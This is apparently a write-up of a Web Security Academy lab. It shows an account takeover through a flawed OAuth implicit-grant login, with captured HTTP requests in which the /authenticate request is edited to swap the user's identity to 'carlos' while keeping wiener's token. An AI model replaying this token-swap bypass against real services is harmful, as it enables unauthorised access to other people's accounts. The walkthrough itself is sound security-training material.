Let's login first with wiener:peter.
Now let's capture our request in Burp.

From there you can inspect and understand all the request its doing to authorize us.

```html
GET /auth?client_id=pm8g83fw7sb3l25xp7sbq&redirect_uri=https://ac541f891eaabe3380160517006200af.web-security-academy.net/oauth-callback&response_type=token&nonce=-1126767315&scope=openid%20profile%20email HTTP/1.1
Host: oauth-ac3c1f6e1ec7be918009055002fc00d4.web-security-academy.net
Cookie: _session=0wKlBlotA4-VYmBV2BGix; _session.legacy=0wKlBlotA4-VYmBV2BGix
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Gpc: 1
Te: trailers
Connection: close
```
As we can see response_type=token. Which means that it's using implicit grant type which grabs the access token and doesn't call for a code. Forward the request slowly while looking at the requests until I saw something that looks vulnerable.

```html
POST /authenticate HTTP/1.1
Host: ac541f891eaabe3380160517006200af.web-security-academy.net
Cookie: session=UyyAlRsm3pxwOALUmP52vSqH0gCuXKmk
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac541f891eaabe3380160517006200af.web-security-academy.net/oauth-callback
Content-Type: application/json
Origin: https://ac541f891eaabe3380160517006200af.web-security-academy.net
Content-Length: 103
Dnt: 1
Sec-Gpc: 1
Te: trailers
Connection: close

{
"email":"wiener@hotdog.com",
"username":"wiener",
"token":"rx6nidB-jgDkFYw9IQUU3Nbl-qCAv0eYs-CkD2scaQj"
}

```
Since it just gives us a token to login, it doesn't check if the token is claimed by someone else. So let's change the username and email to carlos.
```html
POST /authenticate HTTP/1.1
Host: ac541f891eaabe3380160517006200af.web-security-academy.net
Cookie: session=UyyAlRsm3pxwOALUmP52vSqH0gCuXKmk
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac541f891eaabe3380160517006200af.web-security-academy.net/oauth-callback
Content-Type: application/json
Origin: https://ac541f891eaabe3380160517006200af.web-security-academy.net
Content-Length: 103
Dnt: 1
Sec-Gpc: 1
Te: trailers
Connection: close

{
"email":"carlos@carlos-montoya.net",
"username":"carlos",
"token":"rx6nidB-jgDkFYw9IQUU3Nbl-qCAv0eYs-CkD2scaQj"
}
```
And just like that we're able to login as the user carlos.
